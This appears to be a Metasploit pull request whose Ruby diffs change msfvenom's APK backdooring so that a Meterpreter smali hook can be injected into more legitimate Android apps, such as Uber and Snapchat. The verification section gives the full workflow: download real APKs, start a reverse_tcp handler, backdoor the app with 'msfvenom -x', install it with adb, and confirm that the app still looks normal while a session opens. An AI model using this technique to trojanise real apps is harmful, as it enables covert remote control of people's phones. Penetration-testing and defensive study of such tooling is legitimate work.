### PR TITLE
android msfvenom -x, fix smali code injection into a few more APKs

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -241,6 +241,10 @@ class Msf::Payload::Apk
 
     print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
     run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
+    unless File.readable?(injected_apk)
+      raise RuntimeError, "Unable to rebuild apk with apktool"
+    end
+
     print_status "Signing #{injected_apk}\n"
     run_cmd("jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore #{keystore} -storepass #{storepass} -keypass #{keypass} #{injected_apk} #{keyalias}")
     print_status "Aligning #{injected_apk}\n"

--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -227,7 +227,7 @@ class Msf::Payload::Apk
     end
 
     payloadhook = entrypoint + %Q^
-    invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
+    invoke-static {}, L#{package_slash}/MainService;->start()V
     ^
     hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
 

--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -198,12 +198,12 @@ class Msf::Payload::Apk
     end
 
     unless activitysmali
-      raise RuntimeError, "Unable to find hook point in #{smalifiles}\n"
+      raise RuntimeError, "Unable to find hookable activity in #{smalifiles}\n"
     end
 
-    entrypoint = ';->onCreate(Landroid/os/Bundle;)V'
+    entrypoint = 'return-void'
     unless activitysmali.include? entrypoint
-      raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
+      raise RuntimeError, "Unable to find hookable function in #{smalifile}\n"
     end
 
     # Remove unused files
@@ -226,10 +226,10 @@ class Msf::Payload::Apk
       File.open(newfilename, "wb") {|file| file.puts newsmali }
     end
 
-    payloadhook = entrypoint + %Q^
-    invoke-static {}, L#{package_slash}/MainService;->start()V
-    ^
-    hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
+    payloadhook = %Q^invoke-static {}, L#{package_slash}/MainService;->start()V
+
+    ^ + entrypoint
+    hookedsmali = activitysmali.sub(entrypoint, payloadhook)
 
     print_status "Loading #{smalifile} and injecting payload..\n"
     File.open(smalifile, "wb") {|file| file.puts hookedsmali }


### PR DESCRIPTION
This change should increase the number of APK files we can inject the android meterpreter into (e.g com.uber, com.snapchat).
There is still an outstanding issue with apktools ability to properly decode and rebuild some apps.

Pinging @dana-at-cp and @Jack64, I'm interested to know if you think we can do more to make it work with more APKs (without fixing bugs in apktool).

## Verification

- [x] Land and use https://github.com/rapid7/metasploit-payloads/pull/164
- [x] Download a few apk files, e.g: http://es-file-explorer.en.uptodown.com/android/download https://apkpure.com/uber/com.ubercab http://www.apkmirror.com/apk/snap-inc/snapchat/snapchat-9-42-1-0-release/snapchat-9-42-1-0-android-apk-download/
- [x] Start a handler: `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport 4444; set ExitOnSession false; run -j"`
- [x] Backdoor the apk: `msfvenom -x es-file-explorer-4-1-4-3.apk -p android/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -o met.apk && adb reverse tcp:4444 tcp:4444 && adb install met.apk` (this uses adb reverse to forward the connection over adb)
- [x] Open the app 
- [x] **Verify** the app behaves as before (see Note)
- [x] **Verify** you get a session

Note: Some apps (e.g WhatsApp and ES file explorer) may have some kind of anti-reverse engineering pop-up or error message. This PR does not attempt to fix that.
 
